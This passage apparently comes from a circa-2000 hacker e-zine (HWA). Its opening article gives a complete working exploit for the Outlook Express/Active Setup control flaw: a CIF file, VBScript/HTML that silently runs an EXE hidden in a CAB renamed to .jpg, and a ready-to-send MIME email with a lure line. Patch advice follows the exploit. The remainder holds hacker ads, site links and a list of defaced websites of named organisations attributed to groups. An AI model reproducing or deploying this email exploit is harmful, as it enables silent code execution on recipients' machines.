     "DON'T USE OUTLOOK EXPRESS! It's too intelligent." They are
     right I guess. Outlook Express uses components of Internet
     Explorer to handle HTML files. So You can display HTML messages
     in Outlook express. More important, YOU CAN RUN VBSCRIPTS in
     Outlook Express.
     
     How is it going to help? SIMPLE. I attach a file called "x.jpg"
     to a email and send it to the client, and the client downloads
     it using Outlook Express. When he/she VIEWS THE EMAIL (when
     he/she clicks on the subject in the message window), Outlook
     Express tries to display the attached "x.jpg" file as a JPEG
     attachment. For this, it saves the JPEG file in the directory
     pointed by the environment variable TEMP. This is mapped to
     C:\WINDOWS\TEMP on most machines. So, "x.jpg" is saved as
     "C:\WINDOWS\TEMP\x.jpg". Now, if i create a CAB file (with my
     malicious EXE program in it) and rename it to "x.jpg" and
     attach it to a email message, it will go to the same location.
     Outlook Express will fail to display the file (will show an
     icon with "X" instead). So, I now know the location of the CAB
     file on the client machine. I can also execute VBScript from
     the same email message (which contains HTML), which will then
     create and initialize the Active Setup control to install from
     the local file (C:\WINDOWS\TEMP\x.jpg). The Active Setup
     control does not mind the different file extension. Then, when
     the VBScript asks the control to process the components of the
     CAB file, the malicious EXE program can execute.
     
     Practical Demonstration
     
     First, let us build the CAB file. We have the executable EXE
     program which has to be executed on the target machine. Let's
     call it ASDF.EXE. This ASDF.EXE could be a non-interactive
     program which runs silently (as in a real life cracking
     scenario) without any visual indication of it running. For our
     example we may make a copy of NOTEPAD.EXE and call it ASDF.EXE.
     
     Now, we need to put another file into the CAB. It is a cabinet
     information file (CIF). An example file is given as follows
     (with comments). More on creating this file, and fields you can
     put in it, is present in a description of the Active Setup
     control given in one of the links at the end of this document.
     
     ; Start of ASDF.CIF (note: semicolon is for comment)
     ; Anything in [] means a section
     [Version]
     Signature=$Chicago$
     ; DisplayName gives the name that the Active Setup
     ; control displays when it tries to install the component
     ; (if you ask it to display progress indicators, etc.)
     DisplayName=Active Setup Control Sample Exploit
     ;Require 1MB of free space to start
     MinFileSize=1000
     ; [ASDF] is a section devoted to the dummy
     ; ASDF component we will fake installing.
     [ASDF]
     ; Guess you know this already.
     DisplayName=ASDF Sample Main Module
     ; GUID is a unique ID.. guess something unique will do.
     GUID={AABBCCDD-B00B-FACE-DADA-00AA00BB00CC}
     ; URLn point to URLs of various CAB files. Our CAB file
     ; will eventually be disguised (renamed) as a JPG file
     ; and be stored in "asdf.jpg". so there.
     URL1="ascb.jpg",3
     ; Sizen = compressed/actual size of installation files on disk?
     ; A dummy value greater than size of "ASDF.EXE" should do.
     Size1=1417,1430
     ; This is important. Commandn gives the name of the
     ; command (in the CAB file) to execute when installation
     ; starts. This will be our EXE file.
     Command1="asdf.exe"
     ; Type of installation. This field is described in the
     ; documentation for the Active Setup control.
     Type1=2
     Version=1,00,1234,0
     ; 0 = no reboot, 1 = reboot.
     ; obviously, DON'T REBOOT AFTER INSTALLATION IS COMPLETE!
     Reboot=0
     ; Space occupied by the installed files. A dummy value
     ; greater than size of "ASDF.EXE" should do.
     InstalledSize=980,524
     ; End of ASDF.CIF
     
     We now need a program to create the CAB archive which will
     contain the two files ASDF.EXE and ASDF.CIF. MAKECAB.EXE, which
     is included with Microsoft Visual Studio distributions doesn't
     seem to be able to handle more than one file inside the CAB
     archive. You may try a shareware program like Archive Explorer
     available from http://www.dennisre.com/ax/ to create your CAB
     files.
     
     Once your CAB file is created (containing ADSF.EXE and
     ASDF.CIF), rename the CAB file to ASDF.JPG. Now, the CAB file
     is ready. Let's move on to the VBScript part.
     
     Create a HTML file with the following contents. The contents
     are described with comments in the file itself. No further
     explanation should be necessary.
     
     <!-- Start of HTML code -->
     <HTML>
     <HEAD>
     <TITLE>Hi</TITLE>
     </HEAD>
     <!-- On loading, we execute the VBScript function TryInstall()
     -->
     <BODY OnLoad="TryInstall()">
     <!--
     Create an object with the following classid. The classid
     is for the HKEY_CLASSES_ROOT\ASControls.InstallEngineCtl
     and can be verified using REGEDIT.EXE. Call the object "Inst".
     This is our Active Setup control we will exploit.
     -->
     <object id="Inst"
     classid="CLSID:6E449683-C509-11CF-AAFA-00AA00B6015C">
     </object>
     <script language="VBScript">
     <!--
     Sub TryInstall()
     'Set the BaseUrl to C:\WINDOWS\TEMP
     'and the CIF file to ASDF.CIF which is inside
     'ASDF.JPG (which is actually the renamed CAB file).
     'This is because Outlook Express will save the asdf.jpg
     'file in C:\WINDOWS\TEMP on most systems.
     Inst.BaseUrl = "file:///C:/Windows/Temp"
     Inst.SetCifFile "asdf.jpg", "asdf.cif"
     'Now, the installation engine of the Active Setup control
     'will unpack the CAB file and initialize itself with details
     'from the included CIF file. But this takes TIME. If this were
     'Visual Basic, we could have polled Inst.EngineStatus in a loop
     'with a DoEvents in it. But this won't work in VBScript.
     'So we will introduce a delay for the engine to initialize
     itself.
     'There is no Sleep() function in VBScript :(
     '
     'We can simulate a 1/2 second sleep using the following
     workaround
     'by splitting up our code into two functions.
     x = SetTimeout("DoRest",500,"VBScript")
     End Sub
     Sub DoRest()
     'Ah! 1/2 second has passed. So has the engine initialized
     itself?
     If Inst.EngineStatus <> 3 Then
     'Uh oh! We have a problem if EngineStatus <> 3! If you have
     followed
     'instructions correctly, this would mean that the 1/2 second
     delay
     'was not enough. Or maybe you have installed Microsoft's
     patches :)
     'If a larger delay doesn't help, check if the file "ADSF.JPG"
     exists
     'in C:\WINDOWS\TEMP and it is a valid CAB file and it contains
     the
     'ASDF.CIF and ADSF.EXE files. Check if ASDF.CIF has valid and
     correct
     'information.
     '
     'The thing anyone would do now would be to silently exit the
     VBScript and
     'keep quiet about it.
     Exit Sub
     End If
     'Oh wow! We have things moving now. There were no problems with
     the
     'engine initialization.
     'SetAction sets the action for the [ASCB] module to be
     1=Install module.
     'SetAction accepts values other than 1 for uninstall, etc.
     Inst.SetAction "ASCB", 1
     'ProcessComponents is used to start the install (our dummy
     install).
     'This will execute the command described by Command1="asdf.exe"
     line
     'in ASDF.CIF file.
     '
     'ProcessComponents with an argument of 7 (111 binary) will
     inhibit
     'the display of all progress and status and information windows
     during
     'the dummy installation.
     Inst.ProcessComponents 7
     'Well, if you have come so far, your program ASDF.EXE has
     already run.
     'So there.
     End Sub
     //-->
     </script>
     </BODY>
     </HTML>
     <!-- End of HTML code -->
     
     Now what? Well, I guess it should be simple now. Create an
     email message containing the above HTML. Attach the ASDF.JPG
     file to it. Send it to the target client.
     
     A sample email which you can pipe into /usr/lib/sendmail is
     given as follows. This will work with Outlook Express.
     Use "/usr/lib/sendmail -t < the_following_text.txt".
     
     From: Sender <sender@yourhost.com>
     To: Receipient <receipt@targethost.com>
     Subject: Hi
     MIME-Version: 1.0
     Content-Type: multipart/mixed;
     boundary="----=_NextPart_000_0071_01BF2DD4.558D3F20"
     This is a multi-part message in MIME format.
     ------=_NextPart_000_0071_01BF2DD4.558D3F20
     Content-Type: multipart/alternative;
     boundary="----=_NextPart_001_0072_01BF2DD4.558D3F20"
     ------=_NextPart_001_0072_01BF2DD4.558D3F20
     Content-Type: text/plain;
     charset="us-ascii"
     Here is a great picture for you....!!!
     ------=_NextPart_001_0072_01BF2DD4.558D3F20
     Content-Type: text/html;
     charset="us-ascii"
     <HTML>
     <HEAD>
     <TITLE>Hi</TITLE>
     </HEAD>
     <BODY OnLoad="TryInstall()">
     Here is a great picture for you....!!!
     <object id="Inst"
     classid="CLSID:6E449683-C509-11CF-AAFA-00AA00B6015C">
     </object>
     <script language="VBScript">
     <!--
     Sub TryInstall()
     Inst.BaseUrl = "file:///C:/Windows/Temp"
     Inst.SetCifFile "asdf.jpg", "asdf.cif"
     x = SetTimeout("DoRest",500,"VBScript")
     End Sub
     Sub DoRest()
     If Inst.EngineStatus <> 3 Then
     Exit Sub
     End If
     Inst.SetAction "ASDF", 1
     Inst.ProcessComponents 7
     End Sub
     //-->
     </script>
     </BODY>
     </HTML>
     ------=_NextPart_001_0072_01BF2DD4.558D3F20--
     ------=_NextPart_000_0071_01BF2DD4.558D3F20
     Content-Type: image/jpeg;
     name="asdf.jpg"
     Content-Transfer-Encoding: base64
     Content-Disposition: attachment;
     filename="asdf.jpg"
     TVNDRgAAAACaSAAAAAAAACwAAAAAAAAAAwEBAAIAAADKUQAAXgAAAAIAAxUA0AA
     AAAAAAAAA
     YOUR MIME ENCODED ASDF.JPG FILE (CABINET FILE)
     GOES HERE. use "mimencode" to encode your file.
     JzyP5RPpLP721w5JQuJDq4X9V+Lg9T+5N/TYlKJPQO5OhkNNxv/C5VJSf1mvnD/
     dkpPBfy+X
     seZRxIgSPp8AAA==
     ------=_NextPart_000_0071_01BF2DD4.558D3F20--
     .
     
     Place your MIME base64 encoded ASDF.JPG file in the place shown
     above. Remove the lines with the junk characters (watch the
     spacing). They are retained above as delimiters for your
     reference. You should put your own MIME encoded ASDF.JPG in
     place of it. You can MIME encode your file using the
     "mimencode" program.
     
     Cons and defences
     
     This bug is BIG. Anyone can do anything with your computer if
     you use Outlook Express and have not taken precautionary
     measures. The threat of email viruses, email bombs, etc. cannot
     be ruled out. More importantly, if your computer contains
     classified data, this can easily be transferred out. Proxies
     and firewalls cannot prevent any damage!
     
     What can be done?
     
     1. Download the patches from Microsoft's website for the Active
     Setup control and install them.
     2. Junk Outlook Express. It is too intelligent. Use a simple
     e-mail client such as PINE.
     3. Set your TEMP directory to something else.
     4. Disable all ActiveX component execution (High security
     zone).
     
     Links
     
     http://www.securityfocus.com/bid/775/ - Active Setup control
     vulnerability details on securityfocus.com.
     http://msdn.microsoft.com/library/periodic/period98/vbpj0798.ht
     m - Documentation on the Active Setup control.
     http://www.microsoft.com/technet/security/bulletin/fq99-048.asp
     - Microsoft's security bulletin for the vulnerability.
     http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascont
     rol.htm - Microsoft's update for the control.
     http://pages.whowhere.com/computers/cuartangojc/ - Juan Carlos
     Garcia Cuartango's pages.
     http://www.securityfocus.com/ - Security news, BUGTRAQ,
     security related utilities, etc.
     
     Author
     
     I'm a student of M.Sc. Computer Science. I do security
     analysis, Linux network security, web development, 3D-game
     programming, demos, network programming, data compression, etc.
     I know C, x86 asm. My primary development platform has been
     Linux for the past 5 years. I love music.
     
     I trust opensource systems.
     
     This bug scares me and sometimes makes me laugh too. After
     working on numerous vulnerabilities which needed setting up
     byte sequences to exploit buffer overflows, and other stuff,
     this vulnerability comes along. And it says, roll your own EXE
     file, transfer and execute it on any machine. Beats everything
     I have seen so far.
     
     Please educate people about this bug. This bug is more severe
     than it seems. Spread the word asking people to download the
     patches off Microsoft's site and install them.
     
     PS: Although I would love to hear from you, please DO NOT bomb
     me with mail ;) Please keep your discussions on this topic on
     BUGTRAQ as much as you can. You can get all the information you
     need in this document and by following the links given above.
     If you have any problems with the content on this page and want
     me to take some of it off, please contact me.
     
     Cheers!
     Mukund <muks@crosswinds.net>
     
     @HWA
     
                    
             
      
                        

     
AD.S  ADVERTI$ING.       The HWA black market                  ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                              _                _   _     _
                     /\      | |              | | (_)   (_)
                    /  \   __| |_   _____ _ __| |_ _ ___ _ _ __   __ _
                   / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
                  / ____ \ (_| |\ V /  __/ |  | |_| \__ \ | | | | (_| |
                 /_/    \_\__,_| \_/ \___|_|   \__|_|___/_|_| |_|\__, |
                                                                  __/ |
                                                                 |___/
                                                                 
                                                                 
       ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG
       
       
       

        ______________________________________________________________
        
        French Hackers' Portal / Le Portail Des Lascars Francophones
        Links and News of interest / Liens et news pour lascars.  ;-)
        
        --------------------------------------------------------------
        ->->->->->->->->->  http://lascars.cjb.net  <-<-<-<-<-<-<-<-<-
        ______________________________________________________________

  


       
       
                      http://revenger.hypermart.net
                      
                                          
                                                          
                                                        
                                                
                                                        
                                                             
                                                's
    
              T E X T Z             F I L E                 HOMEPAGE
                        http://revenger.hypermart.net
    
                   Here you may find up to 340 text files for:
         ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS ,
         UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC ,
         PHREAKING , BOOKS AND A-S FILES AVAILABLE!
    
                        http://revenger.hypermart.net
    
                                Visit Us Now !
           
       
         
       
                                               .
                                                        .
               ...............          .
               :             :     .  . . .  .          .
             __:________     :          :   ___________ . .   .
             \       < /_____:___       :  (      < __( :_______
              )                : )______:___\_     (___(     : /
        =====/________|_________/ < |      : (________________(======
               :           (__________________)         :wd!
               .             :          :               :
           - / -  w w w . h a c k u n l i m i t e d . c o m  - / -
               :        .  . . .  .     :               :
          .  . . .  .                   :...............:
                             .
               .


      
      
    **************************************************************************
    *                                                                        *
    *        ATTRITION.ORG     http://www.attrition.org                      *
    *        ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
    *        ATTRITION.ORG     DoS Database, Crypto Archive                  *
    *        ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
    *                                                                        *
    **************************************************************************      
              
 
    +------------------------------------------------------------------------+
    | SmoG Alert ..          http://smog.cjb.net/        NEWS on SCIENCE     |
    | ===================    http://smog.cjb.net/        NEWS on SECURITY    |
    | NEWS/NEWS/NEWS/NEWS    http://smog.cjb.net/        NEWS on THE NET     |
    |                        http://smog.cjb.net/        NEWS on TECHNOLOGY  |
    +------------------------------------------------------------------------+
       
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **
    *       www.csoft.net webhosting, shell, unlimited hits bandwidth ...    *
    *         www.csoft.net www.csoft.net www.csoft.net www.csoft.net        *
    *                                                                        *
    *                    http://www.csoft.net/                               *
    *                                                                        *
    *             One of our sponsors, visit them now                        *
    *                                                                        * 
    * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


        

     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                 Don't worry. worry a *lot*
                                                 
      Not much this week, but this is worth a peek .. heh tnx multisync for
      the url... - Ed

      http://www.hardocp.com/news_images/2000/february_2000/bsod.jpg                                                 
      
       
      
                  
      @HWA
      
      
      =-----------------------------------------------------------------------=
      
      
                                   _ _
                               ___(_) |_ ___ ___
                              / __| | __/ _ Y __|
                              \__ \ | ||  __|__ \
                              |___/_|\__\___|___/       
       
       
     SITE.1  
     
     -=- Coding/Software -=-
     
     http://www.dragonmount.net/dirc 
     
     erikR
     
     
     Not security or hack related, well hack as in a code hack maybe..this is
     a new windows32 based irc client which I think could very well usurp mIRC
     from its position at #1 for windows. Check it out, the development team
     is willing to listen to suggestions etc, how often do you get a chance to
     get your ideas acted on in a new product? ... - Ed
     
     
     -=- Hacking/Security -=-
          
     http://hackdesk.dhs.org/
     
     iPulse
     
     A new site under major development (but still looking good and working
     well in this limited fashion) well worth a visit, we'll be hearing and
     seeing more from HackDesk Labs in the future, I'm sure of it, check it
     out. - Ed
     
     
     -=- Security -=-
     
     
     http://www.pure-security.net/
     
     This site has come a long way since its inception in fact its founder
     commonly known as MostHated has come a long way too. The site is very
     informative, well laid out and professional. Check it out today, and
     remember the people behind the site know their shit.
     
     
     Blurb from the site; (Verbatim)
     
     
     Services 

     Here we are dedicated to security on whatever it is you want secured, let it
     be your personal computer, a workstation at your job, your private network
     or even a corporations network, it doesn't matter as long as they are secure,
     which is something we emphasize here at PSN. Some people list services
     in which they want to brag about, because maybe they are specialized in
     certain area and may charge a flat rate. Well, here we don't, we charge
     depending on network structure and work being actually done and i
     guarantee we don't charge probably anywhere close to as high as other
     firms. We here would rather have your security strong then our pockets
     filled, because our work makes a difference and that is more important then
     having a lot of money. Simple contact us with what it is you need done and
     we will begin to start negotiating a contract type work or whatever it is you
     want done, because you can even hire one of us to be your security
     administrator and be dedicated to your network and it's security under your
     wing. However you want it done, we are here to supply the services and
     hope to suit your satisfaction with our work. Always remember that your
     security now could save you a lot of money in the future against malicious
     type people or just someone who enters your network and makes a
     mistake. It is a must and we please ask if you don't want our services for
     your security of your site, then please search somewhere for another firm or
     do it yourself, as long as your security is one of the top concerns on your
     network. We hope to be hearing from you and as time goes, we'll give
     dedicated services or service packages for our clients, but for now, it is
     whatever you would like done. 

     To contact on getting security help through PSN or just to gain information
     about how we work, then please contact us here.(most@pure-security.net)
     
     
     
     -=- Security -=-
     
     
     
     http://www.csanetworks.com/
     
     The premier site of systemV (Edward Elliot) also an ex gH (Global Hell)
     member, is looking good, another professional looking site, check her
     out and scope out the goods from people that can deliver.
     
     Blurb from the site: (Verbatim)    
     
     Why Choose CSANetworks.com? 
     
     At CSA Networks we have what it takes to get your
     business or network secure and ready for the day to
     day hazards of online. From large corporate networks,
     that have company critical information, to small home
     networks that are host to the latest quake server,
     you must be sure you are ready. We here at CSA
     Networks can provide you the services needed to
     keep your networks secure. From remote access, to
     snooping co-workers and the like. We offer one of the
     most Comprehensive Security Assessments, Risk
     Analysis, and Client-System Tests in the market, and
     at a fraction of the price of other competitors.
     
     
     -=-
     
           
            
            
      You can Send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
     ~~~~~~~~~~~~~~~~
    
                    ___|                  _ \               |
                   |      __| _` |\ \  / |   |  __| _ \  _` |
                   |     |   (   | `  <  |   | |    __/ (   |
                  \____|_|  \__,_| _/\_\\___/ _|  \___|\__,_|


      Note: The hacked site reports stay, especially wsith some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as 
      the channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      ========================================================================== 
      
      
      * Info supplied by the attrition.org mailing list.
      
      Cracked webpage archives (list from attrition)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.attrition.org/
      http://www.hackernews.com/archive/crackarch.html
      http://www.freespeech.org/resistance/
      http://www.rewted.org/cracked/
      http://www.403-security.org/
      http://www.projectgamma.com/defaced/
      http://www.net-security.org/
      http://www.netrus.net/users/beard/pages/hacks/
      http://212.205.141.128/grhack/html/default_hacking.html
      http://194.226.45.195/hacked/hacked.html
      http://alldas.de/crkidx1.htm
      http://www.turkeynews.net/Hacked
      http://www.flashback.se/hack/
      http://www.dutchthreat.org/
      http://www.onething.com/archive/
      http://www.2600.com/hacked_pages/
      http://hysteria.sk/hacked/
      http://erazor.vrnet.gr/
      
      
      
      
      Cracked sites listed oldest to most recent...does anyone read these?
      
      
       Date      OS Group/Person      AMCK Site                            2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                          ~~~~~~~~
      
      [00.02.29] NT [ ]                M   Itri Rodoferrovia e Servicos Ltda (itri.com.br)
      [00.02.29] NT [zillion]              CompuAll Inc (www2.compuall.net)
      [00.02.29] NT [Opiat3]               Security Bank (www.sec-bank.com)
      [00.02.29] NT [Crime Boys]           Lojas Arno Palavro Ltda (www.lojasarno.com.br)
      [00.02.29] NT [Crime Boys]           Data Brasil (www.databrasil.com.br)
      [00.02.29] NT [ ]                    Valhalla Union Free School District (valhalla.k12.ny.us)
      [00.02.29] NT [Tr1pl3 S31S]       C  SABA (saba.co.za)
      [00.02.28] NT [ ]                M   Sebrae - Servico De Apoio as Micro E Pequenas (www.sebrae-sc.com.br)
      [00.02.28] Li [g04tz s3kur1ty]       Sinnerz (www.sinnerz.com)
      [00.02.28] NT [ ]                 C  Net Service Assessoria e Informatica (www.rjnet.com.br)
      [00.02.28] Ir [IZ corp]              vof Heksenkethel (www.heksenkethel.nl)
      [00.02.28] NT [Cyber Fuckers]        The Georgia, Ukraine, Uzbekistan, Azerbaijan and Moldova Group (www.guuam.org)
      [00.02.28] BI [Cyber Fuckers]        Embassy of Finland in Ottawa, Canada (www.finemb.com)
      [00.02.28] NT [Cyber Fuckers]        Embassy of Azerbaijan in the USA (www.azembassy.com)
      [00.02.28] Ir [IZ corp]              Animece (www.animece.com.ve)
      [00.02.27] NT [IZ corp]              Working Consultoria e Assessoria em Comunicacao Ltda (www.workingnet.com.br)
      [00.02.27] Lr [sCr33n DuMp]          Zero Tolerance (www.zero-tolerence.com)
      [00.02.27] So [Starman_Jones]        Weston High School (www.westonhighschool.com)
      [00.02.27] NT [W.H.I.T.E]            Thames Valley District School Board (www.tvdsb.on.ca)
      [00.02.27] NT [grn]                  REB (www.reb.com)
      [00.02.27] NT [W.H.I.T.E]            Education - Management Board Secretariat (www.ocdsb.edu.on.ca)
      [00.02.27] Li [DHC]                  Miss Universe, Trinidad and Tobago (www.missuniverse.co.tt)
      [00.02.27] NT [Bash]                 Michigan Section for the American Water Works Association (www.mi-water.org)
      [00.02.27] NT [KabraLzZ]             MexiCom (www.mexicom.com.mx)
      [00.02.27] NT [VUGO and DD]      M   HydroPower (www.hydropower.com.br)
      [00.02.27] NT [W.H.I.T.E]            Gonzaga High School, Newfoundland (www.gonzaga.k12.nf.ca)
      [00.02.27] NT [Arsenationa]          Elizabeth City MotoCross Club (www.ecmx.com)
      [00.02.27] NT [n0p]                  Chestnut Health Systems (www.chestnut.org)
      [00.02.27] Ir [IZ corp]              Boehme Brasil Consultoria Empresarial Ltda. (www.boehme.com.br)
      [00.02.27] Li [ncode and dumone]     Asia Travels (www.asia-travels.com)
      [00.02.27] NT [H and X-Girl]         Alphaville Veculos Ltda (www.alphavel.com.br)
      [00.02.27] NT [KabraLzZ]             Associacao Brasileira da Industria (www.abimaq.org.br)
      [00.02.27] NT [protokol]         M   ABC Unified School District (www.abcusd.k12.ca.us)
      [00.02.27] Lr [GForce Pakistan]      University of Wales, Swansea (pyjamas.swan.ac.uk)
      [00.02.27] NT [t.g.s.u]              Jiangsu Economic Information Network (jsfamous.js.cei.gov.cn)
      [00.02.27] NT [Amatus]               Fuzzy Gamer (fuzzygamer.powersurfr.com)
      [00.02.26] So [kryptek]           C  Autonomous System of System Architecture Laboratory CE96 Server (ce96.kaist.ac.kr)
      [00.02.26] NT [Death Knights]        Well Computer (www.wellcomputer.com.br)
      [00.02.26] NT [VUGO and DD]          Vivo Desejo Decoracao de Festas Ltda (www.vivodesejo.com.br)
      [00.02.26] NT [VUGO and DD]          Transboy Entregas Rpidas Ltda. (www.transboy.com.br)
      [00.02.26] Lr [sCr33n DuMp]          Seriously Cool (www.seriouslycool.com)
      [00.02.26] Lr [AnTil00p]             Presente (www.presente.com.mx)
      [00.02.26] NT [skeme]                County Kildare Community Network (www.kildare.ie)
      [00.02.26] Li [Mr_OZZY]              IKRO (www.ikro.com.br)
      [00.02.26] NT [Team eScape]          Half Life S.A. (www.half-life.co.za)
      [00.02.26] Lr [ ]                    H2SO4 (www.h2so4.org)
      [00.02.26] NT [Tr1pl3 S31S]          Groen Hoek S.A. (www.groenhoek.co.za)
      [00.02.26] Bf [MindVox]              Freakers (www.freakers.org)
      [00.02.26] NT [zb]                   Ensoniq Corporation (www.ensoniq.com)
      [00.02.26] Lr [sCr33n DuMp]          Elite Hackers (www.elitehackers.net)
      [00.02.26] NT [Bash]                 Computing Edge (www.computingedge.com)
      [00.02.26] NT [Cyber Fuckers]     C  Comisin Federal de Competencia (www.cfc.gob.mx)
      [00.02.26] NT [Death Knights]     C  Botafogo De Fuebol e Regatas (www.botafogo.com.br)
      [00.02.26] Li [|3|aqU3 WrM]         CapSync Systems Inc. (www.bbmcc.com)
      [00.02.26] Lr [sCr33n DuMp]          A Perfect World (www.aperfectworld.com)
      [00.02.26] Lr [heataz]               AnnuPro (www.annupro.fr)
      [00.02.26] NT [Team eScape]          2nd Hand Games S.A. (www.2ndhandgames.co.za)
      [00.02.26] So [kryptek]           C  Autonomous System of System Architecture Laboratory Former4 Server (former4.kaist.ac.kr)
      [00.02.26] So [kryptek]              CC Club of the Autonomous System of System Architecture Laboratory (ccclub.kaist.ac.kr)
      [00.02.25] NT [Crime Boys]           Xerox Italia (www.xerox.it)
      [00.02.25] NT [Xhostrile]            Vermont National Bank (www.vermontnationalbank.com)
      [00.02.25] NT [fragile]              Cytron Technologies Ltd. (www.tnyw.com)
      [00.02.25] NT [sk|tz0-NET]           Phant0mNet (www.phant0m-net.com)
      [00.02.25] Li [ ]                    Net Nuri (www.netnuri.com)
      [00.02.25] NT [c0rvus]               Memphis Library (www.memphislibrary.lib.tn.us)
      [00.02.25] NT [VUGO and DD]          PH Promoes & Produes Artisticas S/C Ltda (www.marceloaguiar.com.br)
      [00.02.25] So [GForce Pakistan]      Levi's Music (www.levismusic.com)
      [00.02.25] NT [Cyber Fuckers]        Associacao Alumni/Alumnae do JMC (www.jmc.org.br)
      [00.02.25] NT [VUGO]                 Condomnio Edificio Royal Dansk (www.haddadseguros.com.br)
      [00.02.25] NT [rat]                  DoSolutions (www.dosolutions.com)
      [00.02.25] NT [ ]                    Devils Clan (www.devi1.com)
      [00.02.25] NT [Team Infinity]        Converse College (www.converse.edu)
      [00.02.25] BI [Quant4m]              Buns Bunny (www.bunsbunny.com)
      [00.02.25] NT [Erica]                BFNCOL S.A. (www.bfncol.co.za)
      [00.02.25] NT [Death Knights]        Information System and Tecnology Innovation (www.abramo.it)
      [00.02.25] NT [Team Infinity]        Yamaha Motor Europe (www.yme.com)
      [00.02.25] NT [KabraLzZ]             VISAR Informatica Ltda. (www.visar.com.br)
      [00.02.25] NT [Team Infinity]        Southwestern University School of Law (www.swlaw.edu)
      [00.02.25] NT [VUGO and DD]          Nike Taiwan (www.nike.com.tw)
      [00.02.25] NT [Mr Ozzy]              Cursos e Servios em Informtica Ltda. (www.newworldmd.com.br)
      [00.02.25] NT [bash]                 Lima Public Library (www.lima.lib.oh.us)
      [00.02.25] NT [Tr1pl3 S31S]          Kloppers S.A. (www.kloppers.co.za)
      [00.02.25] NT [Death Knights]     C  Bricks and Clay Roof Tiles Industry Manufacturer (www.ilr.it)
      [00.02.25] NT [Team Echo]            City Realty (www.citirealty.com)
      [00.02.25] NT [KabraLzZ]             Boca Deurna (www.bocadeurna.com.br)
      [00.02.25] NT [VUGO and DD]          96 Automation Co. (www.96auto.com.tw)
      [00.02.25] NT [Aero]                 Trinity Solutions (trinitysolutions.com)
      [00.02.24] NT [Mickey Mouse]         Theatre UK (www.theatreuk.co.uk)
      [00.02.24] Li [Death Knights]    M   Outcome (www.outcome.it)
      [00.02.24] NT [#Swehack]             House of Sin (www.houseofsin.com)
      [00.02.24] Li [ ]                 C  Gestione immobili ad uso alberghiero (www.amorosa.it)
      [00.02.23] NT [DS]                   Racom Corporation (www.racom.net)
      [00.02.23] NT [idiot]            M   Daeil Computer Company (www.p3k.com)
      [00.02.23] NT [Paragon]              Interactive Property Network (www.interactiveproperty.net)
      [00.02.23] NT [fl0w]                 If Virtual (www.ifvirtual.com)
      [00.02.23] So [GForce Pakistan]      Branden University (www.branden.edu)
      [00.02.23] So [Team Echo]            The Phone Store (www.phonestore.com)
      [00.02.23] Bf [L|mp & ProSys]        Mendonza (www.mendonza.org)
      [00.02.23] Lr [A0 & Bsd3M0n]     M   ICM Sport (www.icm-sport.com)
      [00.02.23] NT [ ]                    Happy Harry's Inc. (www.happy.com)
      [00.02.23] NT [ ]                    Alclagraf Paineis e Com (www.alclagraf.com.br)
      [00.02.23] NT [ ]                    TicketPort Name Server (ns.ticketport.co.jp)
      [00.02.22] NT [Cyber Fuckers]        United Nations Educational, Scientific and Cultural Organization in Brazil (www.unesco.org.br)
      [00.02.22] Li [ZeR0LogiKz]           Internet USA Corp. (www.unclesam.net)
      [00.02.22] NT [TheP|nkPanthe|2]      TicketPort (www.ticketport.co.jp)
      [00.02.22] NT [Team Infinity]        Enter Software, Inc. (www.enter.com)
      [00.02.21] NT [ ]                    Boston Public Schools (www.boston.k12.ma.us)
      [00.02.21] NT [Team Echo]            Burkina Faso Ministre de l'Economie et des Finances (www.finances.gov.bf)
      [00.02.21] NT [Pentaguard]           Kuwait Investment Authority (www.kia.gov.kw)
      [00.02.21] NT [ ]                    Legion Internet (www.legion.net)
      [00.02.21] NT [TheP|nkPanthe|2]      Irish Property Brokers and Home Seekers (www.theirishconnection.com)
      [00.02.21] NT [r00t0ff]              GameStead (www.gamestead.com)
      [00.02.21] Bf [Sabu]                 NDV Private School (ndv.pvt.k12.ca.us)
      [00.02.20] NT [ ]                    Globosat Programadora Ltda (www.telecine.com.br)
      [00.02.20] NT [BlazinWeed]           US Army National Guard Bureau Distributive Training Technology Program (dtt.ngb.army.mil)
      [00.02.20] NT [ ]                    Globosat Programadora Ltda (www.telecine.com.br)
      [00.02.20] NT [TheP|nkPanthe|2]      Techno Wolf (www.technowolf.com)
      [00.02.20] Li [Dark 00]              The Stile Project (www.stileproject.com)
      [00.02.20] BI [sysko]                Soft-X (www.soft-x.com)
      [00.02.20] NT [Team Escape]          Rayco Car Electronics (www.raycocar.com)
